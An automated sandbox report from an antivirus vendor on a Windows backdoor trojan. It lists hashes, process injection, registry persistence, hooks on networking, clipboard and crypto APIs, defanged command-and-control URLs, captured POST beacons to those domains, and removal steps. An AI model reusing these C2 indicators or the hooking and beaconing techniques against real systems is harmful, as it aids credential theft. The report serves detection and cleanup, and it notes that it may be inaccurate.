Skip to main content

Gen.Variant.Barys.508_c7f6de3628


HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.6913297 (B) (Emsisoft), Gen:Variant.Barys.508 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: c7f6de3628ab6a3add61ad78a209e742

SHA1: 2c7fef251672220f6b3b75a5f6874692c27c07a9

SHA256: e6e8917ae8e817dc188107ee47297fae68fff632cd77f607cc592436e302cfb9

SSDeep: 6144:iesVRRuMOteGgex1JhEc9otunrGuSnKou8I:iesVRRZOteCJb9Wurcu8I

Size: 279880 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: BorlandDelphi30, UPolyXv05_v6

Company: no certificate found

Created at: 1996-10-11 00:46:34

Analyzed on: WindowsXPESX SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912
%original file name%.exe:1500

The Trojan injects its code into the following process(es):

winlogon.exe:716
Explorer.EXE:840

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1500 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
%System%\config\software (1609 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7E.tmp (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:1500 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB C4 28 90 5D 83 6B 13 3E 56 5E 65 05 DF 12 55"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\hwcmqr.exe_, \??\%WinDir%\apppatch\hwcmqr.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöJîp>¢°oD¬òd¼Œ¤Kô1,Š$ë›ÛÌ«”¹l}Ë {œzŒôC%é[qñl4ì;û´[Ò#»Û:ÑU„„ԝ\±ª²Dƒuœ¡Ü¼);¼\ƒtµ2”kDù”a”*›cü$}Sô|ë$¤ô{¬q³#sÅå\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ãÍ‚“ÉUcdÁÄZ¡r»ô”)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÍÁ=éÔÑщ¬q9|áíù’‘íÁ©šÄR"

Dropped PE files

MD5 File path
1816cb65b60dfd5cda67b640d2cc9c10c:\WINDOWS\AppPatch\hwcmqr.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in CRYPT32.dll:

CertVerifyCertificateChainPolicy

The Trojan installs the following user-mode hooks in WININET.dll:

HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle

The Trojan installs the following user-mode hooks in USER32.dll:

GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CryptEncrypt

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
recv
gethostbyname
WSARecv
send

The Trojan installs the following user-mode hooks in kernel32.dll:

CreateFileW

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:1912
    %original file name%.exe:1500

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\AppPatch\hwcmqr.exe (1983 bytes)
    %System%\config\software (1609 bytes)
    %System%\config\SOFTWARE.LOG (3715 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: Emsi Software GmbH
Product Name: Linsang
Product Version: 2.2.5.6
Legal Copyright: Sphingometer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.7.8.6
File Description: gladless
Comments:
Language: Language Neutral

Company Name: Emsi Software GmbHProduct Name: LinsangProduct Version: 2.2.5.6Legal Copyright: SphingometerLegal Trademarks: Original Filename: Internal Name: File Version: 4.7.8.6File Description: gladlessComments: Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.vz40969947102404.352044f6e09634da4c90b7dd953ce1702f42c
.KU1638411776117764.89534837ef1c592460db53bb0a2ddaec45c79
.tdQZB2867210700130724.66073b0ca603f95ea4181027ccc7ab958e479
.OymKZB1392641085601090565.5381951641e1b65a2cb2835cc21d8dff11a63
.pnxz24985643764415364.39827d335fd78d0ffe50bb1a6551f538495f7
.npt688128235499112645.13754332d7b4a3da2fb0215a3587537bf678c
.UDTsep9256961096141100805.536798517b14b71e4b28a1ba2cfb26fa65561
.sIjI10362882358051203.69965dacc7fed81e832a9a1264511b1d1ed52
.IEE106086450977925603.3090782a69fd3007f3899be75149a3e4656bc
.rsrc1572864841687043.599430fa1b70cf9b960fb9ec5d08aa700265d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://galin.eu/login.php91.195.240.135
hxxp://lyman.eu/login.php81.2.194.128
hxxp://galor.eu/login.php79.96.182.129
hxxp://lykef.eu/login.php86.124.164.25
hxxp://ganiq.eu/login.php46.249.43.105
hxxp://sedoparking.com/login.php
hxxp://gatun.eu/login.php178.210.94.54
hxxp://gadoc.eu/login.php176.221.32.120
hxxp://lyset.eu/login.php91.212.28.29
hxxp://purol.eu/login.php82.165.106.203
hxxp://pumot.eu/login.php217.160.64.207
hxxp://volym.eu/login.php194.9.94.79
hxxp://purac.eu/login.php62.197.128.123
hxxp://vocom.eu/login.php109.235.63.103
hxxp://lykil.eu/login.php194.9.94.235
hxxp://ganar.eu/login.php72.52.4.120
hxxp://lysen.eu/login.php89.31.143.6
hxxp://lyxos.eu/login.php89.31.143.12
hxxp://vocer.eu/login.php85.13.129.76
hxxp://vonak.eu/login.php62.182.63.62
hxxp://ganed.eu/login.php46.28.105.107
hxxp://galik.eu/login.php185.51.65.84
hxxp://volez.eu/login.php78.47.242.93
hxxp://www.gss.dr.dk/login.php
hxxp://purex.eu/login.php149.216.106.61
hxxp://corporate.evonik.com/en/149.216.106.100
hxxp://corporate.evonik.com/en/Pages/default.aspx149.216.106.100
hxxp://gatic.eu/login.php165.160.13.20
hxxp://qexer.eu/login.php217.146.69.17
hxxp://gacek.eu/login.php77.55.97.141
hxxp://gadak.eu/login.php209.140.30.61
hxxp://gater.eu/login.php62.149.128.154
hxxp://lyken.eu/login.php194.9.94.86
hxxp://lymos.eu/login.php195.8.208.58
hxxp://www.gater.eu/login.php62.149.128.45
hxxp://galev.eu/login.php66.96.131.56
hxxp://purel.eu/login.php85.13.132.239
hxxp://lyran.eu/login.php46.30.212.173
hxxp://galen.eu/login.php109.235.63.103
hxxp://vocab.eu/login.php109.235.63.103
hxxp://www.dr.dk/login.php159.20.6.22
hxxp://volar.eu/login.php109.235.63.103
hxxp://www.vocer.org/login.php85.13.129.76
hxxp://www.galin.eu/login.php72.52.4.90
galip.eu91.33.209.210
www.bing.com204.79.197.200

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: header

Location: hXXp://VVV.dr.dk/login.php

Connection: close

Vary: Accept-Encoding

Content-Length: 0

Content-Type: text/html

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyset.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Set-Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a; path=/

Content-Length: 1645

Connection: close

Content-Type: text/html

<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html. PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="robots" content="noindex, follow" />...<title>TYPO3 Error</title>...<base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="typo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />.</head>..<body class="t3-message-page t3-errorpage-message">..<div class="t3-message-page-container">..<div class="t3-message-page-logo">...<img src="typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..<div class="shadow-box-top-428"></div>..<div class="t3-message-page-message typo3-message message-error">...<h1>Page Not Found</h1>...<p class="t3-error-text">Reason: File "login.php" was not found (2)!</p>..</div>..<div class="shadow-box-bottom-424"></div>.</div>..<div id="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an open source content management system. To maintain the quality of the system and to improve it, please help us by donating....TYPO3 CMS. Copyright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:36 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

Set-Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>galen.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>two thousand, four hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">galen.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="http://galen.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mas

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatic.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Connection: close

Date: Mon, 10 Nov 2014 20:01:28 GMT

Content-Length: 94

X-Powered-By: Servlet/2.4 JSP/2.0

<html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volar.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>volar.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">volar.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://volar.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://volar.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://volar.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gater.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:31 GMT

Server: Apache

Location: hXXp://VVV.gater.eu/login.php

Content-Length: 237

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.gater.eu/login.php">here</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadoc.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyman.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:00:57 GMT

Server: Apache/1.3.36 (Unix) mod_ssl/2.8.27 OpenSSL/0.9.7a

Connection: close

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<title>The domain name is registered</title>..<meta http-equiv="Content-Type" content="text/html; charset=windows-1250">..<meta name="description" content="FORPSI je Evropsk. housingov. spole.nost. Nab.z. slu.by webhostingu, serverhostingu, registrace dom.nov.ch jmen a www str.nky na serverech Windows/Linux.">..<meta name="keywords" content="forpsi,webhosting,dom.na,dom.ny,hosting,server,serverhosting,housing,serverhousing,adsl,wifi,wi-fi,domain,domains">..<style type="text/css">..<!--..html, body {...margin: 0px;...padding: 0px;...height: 100%;...background-color: #32549c;..}..#container {...height: 100%;...width: 100%;...text-align: center;..}..#box {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...background-image: url(img/logo_forpsi.gif);...background-repeat: no-repeat;...background-position: left top;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}..#box2 {...width: 520px;...position: relative;...margin: 0 auto;...top: 160px;...border: 4px solid #cccccc;...background-color: #FFFFFF;...padding: 20px;...font-family : Verdana, Arial, Helvetica, sans-serif;...font-size: 14px;...color: #38506b;..}...#flag {...position: absolute;...left: 95px;...top: 60px;..}...txt {...font-family: Verdana, Arial, Helvetica, sans-serif;...font-size:

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocom.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:15 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocom.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocom.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocom.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocom.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocom.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=c8iaii6iap338nn3vbgirvg2u0

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:16 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocom.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocom.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocom.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocom.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocom.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocom.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykef.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Mon, 10 Nov 2014 20:00:40 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 4

Connection: close

'OK'..

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyxos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 200 OK

Date: Mon, 10 Nov 2014 20:01:19 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: ud_standard

Vary: Accept-Encoding

Content-Length: 3207

Connection: close

Content-Type: text/html

<html>.<head>.<meta name="keywords" content=">">.<meta name="description" content="Hier entsteht ">.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.<title></title>.<style type="text/css">.html, body {..height:100%;..margin: 0;..padding: 0;..background-color: #FFF;..font-family: Arial, Verdana, sans-serif;..color: #444;.}..body { text-align: center;}...a:link,.a:hover,.a:visited,.a:focus {..margin: 0;..padding: 0;..border: none;.}...dvLink:link, .dvLink:hover, .dvLink:visited, .dvLink:focus {..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_pfeil.png") left center no-repeat;. border: 0 none;. font-weight: normal;. 1margin-top: 5px;. padding-left: 12px;. text-decoration: underline;. color: #444;.}...dvLink:hover {..color: #003D86;..text-decoration: underline;.}..#wrapper-vorlage {..font-family: Arial, Verdana, sans-serif;..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_hg.png") repeat-x;..width: 100%;..height: 100%;.}..#vorlage {..width: 450px;..margin: 0 auto;..text-align: center;..min-height: 500px;.}..#logo {. border: none;. padding-top: 57px;. margin: 0;.}..#logo img {. border: none;.}..#title {..font-size: 18px;..color: #003d86;. padding-top: 29px;. margin: 0;.}..#content {..background: url("hXXp://VVV.united-domains.de/images/vorlagen/vorlage_kugel.png") 260px 150px transparent no-repeat;..font-size: 14px;..line-height: 18px;..margin-top: 23px;..padding: 29p

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyset.eu

Content-Length: 9

Pragma: no-cache

Cookie: fe_typo_user=b1c1e88940c35517b343ca120e68d52a

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Set-Cookie: fe_typo_user=e8e31fcf457afc81edea23504d0c1def; path=/

Content-Length: 1645

Connection: close

Content-Type: text/html

<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE html. PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<?xml-stylesheet href="#internalStyle" type="text/css"?>.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">.<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />..<meta name="robots" content="noindex, follow" />...<title>TYPO3 Error</title>...<base href="hXXp://lyset.eu/" />...<link rel="stylesheet" href="typo3/sysext/t3skin/stylesheets/standalone/errorpage-message.css" />.</head>..<body class="t3-message-page t3-errorpage-message">..<div class="t3-message-page-container">..<div class="t3-message-page-logo">...<img src="typo3/sysext/t3skin/images/login/typo3logo-white-greyback.gif" alt="TYPO3 logo" />..</div>..<div class="shadow-box-top-428"></div>..<div class="t3-message-page-message typo3-message message-error">...<h1>Page Not Found</h1>...<p class="t3-error-text">Reason: File "login.php" was not found (2)!</p>..</div>..<div class="shadow-box-bottom-424"></div>.</div>..<div id="t3-footer">..<div id="t3-copyright-notice">...TYPO3 is an open source content management system. To maintain the quality of the system and to improve it, please help us by donating....TYPO3 CMS. Copyright .. 1998-2011 Kasper Sk..rh..j. Extensions are copyright of

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galik.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT

ETag: "1007b4-70e-50225bda086dd"

Accept-Ranges: bytes

Content-Length: 1806

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>. <title>ERROR 404 - Not Found!</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="robots" content="noindex" />. <style type="text/css"><!--. body {. color: #444444;. background-color: #EEEEEE;. font-family: 'Trebuchet MS', sans-serif;. font-size: 80%;. }. h1 {}. h2 { font-size: 1.2em; }. #page{. background-color: #FFFFFF;. width: 60%;. margin: 24px auto;. padding: 12px;. }. #header {. padding: 6px ;. text-align: center;. }. .status3xx { background-color: #475076; color: #FFFFFF; }. .status4xx { background-color: #C55042; color: #FFFFFF; }. .status5xx { background-color: #F2E81A; color: #000000; }. #content {. padding: 4px 0 24px 0;. }. #footer {. color: #666666;. background: #f9f9f9;. padding: 10px 20px;. border-top: 5px #efefef solid;. font-size: 0.8em;. text-align: center;. }. #footer a {. color: #999999;. }. --></style>.</head>.<body>. <div id="page">. <div id="header" class="status4xx">. <h1>ERROR 404 - Not Found!</h1>. </div>. <div id="content"

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gacek.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:30 GMT

Content-Type: text/html

Connection: close

Accept-Ranges: bytes

Vary: Accept-Encoding

Server: Apache/2

